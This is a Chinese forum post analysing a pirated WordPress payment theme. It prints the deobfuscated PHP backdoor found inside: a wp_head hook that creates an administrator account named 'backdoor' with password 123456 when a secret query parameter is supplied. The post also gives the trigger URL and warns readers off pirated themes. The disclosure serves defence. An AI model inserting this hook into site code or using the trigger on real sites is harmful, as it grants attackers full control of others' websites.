本帖最后由 longgod 于 2019-12-17 00:42 编辑
原文链接:https://www.52pojie.cn/thread-1066825-1-1.html
下载后用D盾扫描
发现有加密文件,用Notepad++查看
破解混淆加密后得到源文件
经查看发现后门代码
[PHP] 纯文本查看 复制代码 add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
require('wp-includes/registration.php');
if (!username_exists('backdoor')) { //检测是否存在backdoor账户
$user_id = wp_create_user('backdoor', '123456'); //创建账户
$user = new WP_User($user_id);
$user->set_role('administrator'); //设置为管理员权限
}
}
}
使用http(s)://你的域名/?backdoor=go访问,
自动创建用户名为backdoor密码为123456的管理员账户
本地测试
成功登录后台
推荐这种涉及到支付的主题还是用正版,盗版的就如作者所说,很容易被添加后门。
毕竟没有真正免费的午餐。
解密后的文件
core.class.zip
(4.02 KB, 下载次数: 240)
|